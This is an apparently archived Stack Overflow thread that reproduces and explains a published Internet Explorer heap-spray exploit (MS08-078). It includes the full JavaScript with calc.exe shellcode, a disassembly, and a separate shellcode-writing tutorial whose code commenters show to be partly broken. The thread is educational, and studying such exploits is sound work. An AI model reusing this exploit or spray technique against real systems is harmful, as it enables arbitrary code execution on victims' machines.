# How does this milw0rm heap spraying exploit work?

Tags: javascript, x86, exploit, assembly

I usually do not have difficulty to read JavaScript code but for this one I can’t figure out the logic. The code is from an exploit that has been published 4 days ago. You can find it at [milw0rm](https://web.archive.org/web/20100412164007/http://www.milw0rm.com/exploits/7477).

Here is the code:

```
<html>
    <div id="replace">x</div>
    <script>
        // windows/exec - 148 bytes
        // http://www.metasploit.com
        // Encoder: x86/shikata_ga_nai
        // EXITFUNC=process, CMD=calc.exe
        var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580");

        // ugly heap spray, the d0nkey way!
        // works most of the time
        var spray = unescape("%u0a0a%u0a0a");

        do {
           spray += spray;
        } while(spray.length < 0xd0000);

        memory = new Array();

        for(i = 0; i < 100; i++)
           memory[i] = spray + shellcode;

        xmlcode = "<XML ID=I><X><C><![CDATA[<image SRC=http://&#x0a0a;&#x0a0a;.example.com>]]></C></X></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>";

        tag = document.getElementById("replace");
        tag.innerHTML = xmlcode;

    </script>
</html>
```

Here is what I believe it does and I would like you to help me for the part that I misunderstand.

The variable `shellcode` contains the code to open the `calc.exe`. I do not get how they have found that weird string. Any idea?

The second thing is the variable `spray`. I do not understand this weird loop.

The third thing is the variable `memory` that is never used anywhere. Why do they create it?

Last thing: what does the XML tag do in the page?

---

For the moment I have good answers but mostly very general ones. I would like more explanations of the value of the code. An example is `unescape("%u0a0a%u0a0a");`. What does it mean? Same thing for the loop: why did the developer write: `length < 0xd0000`? I would like a deeper understanding, not only the theory of this code.

Comment: You should look into Heap Spraying: http://en.wikipedia.org/wiki/Heap_spraying

Comment: How do we successfully run this exploit? Do we have to run it in IE?

Answer (score 321, accepted):

The shellcode contains some x86 assembly instructions that will do the actual exploit. `spray` creates a long sequence of instructions that will be put in `memory`. Since we can't usually find out the exact location of our shellcode in memory, we put a lot of `nop` instructions before it and jump to somewhere there. The `memory` array will hold the actual x86 code along with the jumping mechanism. We'll feed the crafted XML to the library which has a bug. When it's being parsed, the bug will cause the instruction pointer register to be assigned to somewhere in our exploit, leading to arbitrary code execution.

To understand more deeply, you should actually figure out what is in the x86 code. `unscape` will be used to put the sequence of bytes represented of the string in the `spray` variable. It's valid x86 code that fills a large chunk of the heap and jumps to the start of shellcode. The reason for the ending condition is string length limitations of the scripting engine. You can't have strings larger than a specific length.

In x86 assembly, `0a0a` represents `or cl, [edx]`. This is effectively equivalent to `nop` instruction for the purposes of our exploit. Wherever we jump to in the `spray`, we'll get to the next instruction until we reach the shellcode which is the code we actually want to execute.

If you look at the XML, you'll see `0x0a0a` is there too. Exactly describing what happens requires specific knowledge of the exploit (you have to know where the bug is and how it's exploited, which I don't know). However, it seems that we force Internet Explorer to trigger the buggy code by setting the `innerHtml` to that malicious XML string. Internet Explorer tries to parse it and the buggy code somehow gives control to a location of memory where the array exists (since it's a large chunk, the probability of jumping there is high). When we jump there the CPU will keep executing `or cl, [edx]` instructions until in reaches the beginning of shellcode that's put in memory.

I've disassembled the shellcode:

```
00000000  C9                leave
00000001  2B1F              sub ebx,[edi]
00000003  B10C              mov cl,0xc
00000005  BDC536DB9B        mov ebp,0x9bdb36c5
0000000A  D9C5              fld st5
0000000C  2474              and al,0x74
0000000E  5A                pop edx
0000000F  F4                hlt
00000010  EA8331FC0B6A6A    jmp 0x6a6a:0xbfc3183
00000017  03D4              add edx,esp
00000019  07                pop es
0000001A  67305CFF          xor [si-0x1],bl
0000001E  98                cwde
0000001F  BBD7FFA4FE        mov ebx,0xfea4ffd7
00000024  9B                wait
00000025  74AD              jz 0xffffffd4
00000027  058B8B028D        add eax,0x8d028b8b
0000002C  D893BCCD35A2      fcom dword [ebx+0xa235cdbc]
00000032  37                aaa
00000033  B84290A63A        mov eax,0x3aa69042
00000038  94                xchg eax,esp
00000039  E99AA4D58D        jmp 0x8dd5a4d8
0000003E  E5A3              in eax,0xa3
00000040  1F                pop ds
00000041  4C                dec esp
00000042  EB46              jmp short 0x8a
00000044  4B                dec ebx
00000045  8CD0              mov eax,ss
00000047  AD                lodsd
00000048  A844              test al,0x44
0000004A  52                push edx
0000004B  4A                dec edx
0000004C  3B81B80DD748      cmp eax,[ecx+0x48d70db8]
00000052  4B                dec ebx
00000053  D46C              aam 0x6c
00000055  46                inc esi
00000056  1392734A204F      adc edx,[edx+0x4f204a73]
0000005C  F8                clc
0000005D  6E                outsb
0000005E  DC8EA20726B4      fmul qword [esi+0xb42607a2]
00000064  04D4              add al,0xd4
00000066  D084ECBA978221    rol byte [esp+ebp*8+0x218297ba],1
0000006D  7CE8              jl 0x57
0000006F  C0CA8C            ror dl,0x8c
00000072  F4                hlt
00000073  A6                cmpsb
00000074  47                inc edi
00000075  210D2EA0B0CD      and [0xcdb0a02e],ecx
0000007B  2CA8              sub al,0xa8
0000007D  B05B              mov al,0x5b
0000007F  43                inc ebx
00000080  F4                hlt
00000081  24E8              and al,0xe8
00000083  7A9C              jpe 0x21
00000085  BB857DCBA0        mov ebx,0xa0cb7d85
0000008A  7DED              jnl 0x79
0000008C  92                xchg eax,edx
0000008D  09E1              or ecx,esp
0000008F  96                xchg eax,esi
00000090  315580            xor [ebp-0x80],edx
```

Understanding this shellcode requires x86 assembly knowledge and the problem in the MS library itself (to know what the system state is when we reach here), not JavaScript! This code will in turn execute `calc.exe`.

Comment: I appreciate this effort from you for this explication. +25 reputations and all my respect. Thanks

Comment: great answer but good lord - suddenly i am not good with computer ;-)

Comment: I'm amazed by people who manage to come up with these kinds of exploits. If they're clever enough to hack someone's bank account with this, they deserve all the money they can steal ;)

Comment: If there was a shrine of good answers for SO, this would be in it.

Comment: For those who want to learn about shell code, they might try "The Shellcoder's Handbook" from Wiley press.

Comment: How does the code launch calc.exe? I don't know assembly language - does the disassembled shellcode contain instructions to launch calc.exe - does it make any sense to expect to find the name of executable file in the assembly code? I mean, how does that assembly code load the executable binary into the memory without referring to its name - or is the name hidden somewhere in the code?

Comment: Disassemby seems nonsensical and completely random. That cannot be right. I tried to swap bytes, assuming that the characters in a string were stored in little-endian, but it did not help.

Comment: @Juho: Indeed. I simply used `ndisasm` to disassemble the bytes when I originally wrote this answer. I didn't try to read it. It doesn't make sense to me--probably the instructions don't start at the beginning of the string and there's some other non-executable data that's confusing the disassembler.  Before that, we have to make sure the exploit, as posted, works :) I haven't personally tried it. -- Regardless, the general idea should be the same.

Comment: +1, and one unmentioned point, the assembly code should not contain a 0x00 byte.

Comment: I had to disable Avast to see this answer, but totally worth it :)

Comment: Assembly is effin' powerful. That's one of the most deepest exploits i've ever seen. I have to delve into assembly.

Comment: This asm is nonsense.  It *has to* start on the first byte, too, if they just pepper the heap with it preceded by `nop`s.  They would need to already have ring 0 access to use the `hlt` instruction - unless they're trying to cause an exception.  They do clobber `ebp` to an arbitrary value after discarding the contextual stack frame, but they shouldn't be able to get defined behavior out of doing so.  They're either using layers of exceptions in the kernel to elevate their privileges, or this is plain gibberish.

Comment: @sqykly I presume the exploit posted is gibberish (I never tested it) or I failed to disassemble it correctly, but I suspect the former. Perhaps the website posting the exploit did not want to publish a malicious program.

Comment: @MehrdadAfshari you definitely did it right - I reassembled it and it's identical to the bit.  Of course this is all curiosity and speculation at this point, but is it possible that some other transformation is done on the malicious code before spraying it, in order to evade detection by security software?  Could it be JVM or .NET bytecode, rather than machine code?

Comment: @sqykly I doubt it is JVM bytecode or CIL, but perhaps the failing routine transforms the code prior to jump.

Answer (score 10):

This looks like an exploit of the [recent Internet Explorer bug](http://www.microsoft.com/technet/security/Bulletin/MS08-078.mspx) that Microsoft released the emergency patch for.  It uses a flaw in the databinding feature of Microsoft's XML handler, that causes heap memory to be deallocated incorrectly.

Shellcode is machine code that will run when the bug occurs.  Spray and memory are just some space allocated on the heap to help the exploitable condition occur.

Comment: Do you think some such stuff could happen with Chrome's extensions?

Answer (score 3):

Heap Spraying is common way to exploit browser stuff, if you are into it you can find several posts like this : http://sf-freedom.blogspot.com/2006/06/heap-spraying-introduction.html

Answer (score 2):

Any time I see memory that doesn't get addressed in an exploit discussion, my first thought is that the exploit is some sort of buffer overflow, in which case the memory is either causing the buffer to overflow or is being accessed once the buffer overflows.

Comment: In this case it was not a heap corruption, heap-based buffer overrun or stack-based buffer overrun: http://blogs.msdn.com/sdl/archive/2008/12/18/ms08-078-and-the-sdl.aspx

Answer (score 0):

This is from metasploit, that means it's using one of metasploit shell codes. It's open source so you can go and grab it : http://www.metasploit.com/

Answer (score 0):

See [Character encodings in HTML](http://en.wikipedia.org/wiki/Character_encodings_in_HTML).

It's binary data encoded as a string, which JavaScript is decoding.

Common form of [XSS](http://en.wikipedia.org/wiki/Cross-site_scripting) also.

You can see all the encoding tricks here:

http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project

Answer (score 0):

Simple shellcode example

Hello world in assembly at&t syntax x86 I believe (Wizard in Training).

set up the file:`vim shellcodeExample.s`

```
.text           #required
.goblal _start  #required

_start:         #main function
 jmp one        #jump to the section labeled one:

two:
 pop  %rcx         #pop %rcx off the stack, or something
 xor  %rax, %rax   #Clear
 movl 4, %rax      #use sys_write(printf || std::cout)
 xor  %rbx, %rbx   #Clear
 inc  %rbx         #increment %rbx to 1 stdout(terminal)
 xor  %rdx, %rdx   #Clear Registers or something
 movb $13, %dl     #String Size
 int  $0x80

one:
 call two                   #jump up to section two:
 .ascii "Hello World\r\n"   #make the string one of the starting memory 
                            #^-addresses
```

compile like so:`as -o shellcodeExample.o shellcodeExample.s ; ld -s -o shellcode shellcodeExample.o`

Now you have a binary that prints out hello world.
to convert the binary into shell code type in: `objdump -D shellcode`

you will get the output:

```
shellcode:     file format elf64-x86-64


Disassembly of section .text:

0000000000400078 <.text>:
  400078:   eb 1a                   jmp    0x400094
  40007a:   59                      pop    %rcx
  40007b:   48 31 c0                xor    %rax,%rax
  40007e:   b0 04                   mov    $0x4,%al
  400080:   48 31 db                xor    %rbx,%rbx
  400083:   48 ff c3                inc    %rbx
  400086:   48 31 d2                xor    %rdx,%rdx
  400089:   b2 0d                   mov    $0xd,%dl
  40008b:   cd 80                   int    $0x80
  40008d:   b0 01                   mov    $0x1,%al
  40008f:   48 ff cb                dec    %rbx
  400092:   cd 80                   int    $0x80
  400094:   e8 e1 ff ff ff          callq  0x40007a
  400099:   68 65 6c 6c 6f          pushq  $0x6f6c6c65
  40009e:   20 77 6f                and    %dh,0x6f(%rdi)
  4000a1:   72 6c                   jb     0x40010f
  4000a3:   64                      fs
  4000a4:   0d                      .byte 0xd
  4000a5:   0a                      .byte 0xa
```

Now if you look on the 4th line with text you will see: `400078:   eb 1a                   jmp    0x400094`

the part that says `eb 1a` is the hexadecimal representation of the assembly instruction `jmp one` where "one" is the memory address of your string.

to prep your shellcode for execution open up another text file and store the hex values in a character array. To format the shell code correctly you type in a `\x` before every hex value.

the upcoming shell code example will look like the following according to the objdump command output:

```
unsigned char PAYLOAD[] = 
"\xeb\x1a\x59\x48\x31\xc0\xb0\x04\x48\x31\xdb\x48\xff\xc3\x48\x31\xd2\xb2\xd0\xcd\x80\xb0\x01\x48\xff\xcb\xcd\x80\xe8\xe1\xff\xff\xff\x68\x65\x6c\x6c\x6f\x20\x77\x6f\x72\x6c\x64\x0d\x0a";
```

This example uses C for the array.
Now you have working shellcode that will write to stdout "hello world"

you can test the shell code by placing it in a vulnerability or you can write the following c program to test it:

```
vim execShellcode.cc; //linux command to create c file.

/*Below is the content of execShellcode.cc*/
unsigned char PAYLOAD[] = 
"\xeb\x1a\x59\x48\x31\xc0\xb0\x04\x48\x31\xdb\x48\xff\xc3\x48\x31\xd2\xb2\xd0\xcd\x80\xb0\x01\x48\xff\xcb\xcd\x80\xe8\xe1\xff\xff\xff\x68\x65\x6c\x6c\x6f\x20\x77\x6f\x72\x6c\x64\x0d\x0a";

int main(){
    ((void(*)(void))PAYLOAD)();
    return 0;
}
```

To compile the program type in:

```
gcc -fno-stack-protector -z execstack execShellcode.cc -o run
```

run with `./run`
You know have a working example of simple shellcode development that was tested in linux mint/debian.

Comment: Don't use the `int 0x80` 32-bit ABI in 64-bit code.  It will fail for strings on the stack, because the kernel only looks at the low 32 bits of the syscall args.  [What happens if you use the 32-bit int 0x80 Linux ABI in 64-bit code?](https://stackoverflow.com/q/46087730).  (In that case you'd create an infinite loop, because `sys_write` would return `-EFAULT`, and `mov $1, %al` would leave the upper bits set, so you get `-ENOSYS` instead of sys_exit).  Also, in 64-bit code you can just `jmp` forwards over the string and use a RIP-relative `lea` to get the address, instead of call/pop.

Comment: This will also fail for gcc that builds PIE executables by default, because then even your static-storage char array will be outside the low 32 bits.  (And BTW, if it was `const char payload[]` then it would be in the text segment (in the .rodata section) and you wouldn't need `-z  execstack`.)

Comment: Also, `movl 4, %rax` contains a zero byte (and won't assemble because of operand-size mismatch, and is missing a `$` so the 4 is an absolute address).  I think you posted an early version of your source.  My earlier comments are from looking at the disassembly where you did add a `sys_exit` call.